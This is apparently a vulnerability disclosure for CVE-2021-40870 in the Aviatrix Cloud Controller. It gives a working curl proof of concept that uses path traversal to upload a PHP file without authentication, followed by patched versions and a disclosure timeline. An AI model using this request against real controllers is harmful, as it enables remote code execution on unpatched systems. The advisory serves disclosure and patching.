While the Aviatrix UI requires authentication, many API calls do not enforce a check for authentication. Some of these API calls allow an unauthenticated attacker to upload arbitrary files, including .php
scripts, to the filesystem. These uploaded scripts will be processed by the web frontend, allowing an attacker to run code of their choosing.
Make the following request to the Aviatrix Cloud Controller aviatrix
:
curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/test.php -d 'data=hello<?php phpinfo()?>'
Visit https://aviatrix.domain.tld/v1/test
. This will show the PHP Version page.
Upgrade to one of the following versions:
UserConnect-6.2-1804.2043 or later
UserConnect-6.3-1804.2490 or later
UserConnect-6.4-1804.2838 or later
UserConnect-6.5-1804.1922 or later
2021-05-12: Discovered
2021-08-24: Reported to Aviatrix security team
2021-08-26: Aviatrix security team confirm vulnerability will be fixed in forthcoming release
2021-09-11: Fix released
2021-09-12: CVE requested
2021-09-13: CVE allocated
https://github.com/0xAgun/CVE-2021-40870
https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-40870.yaml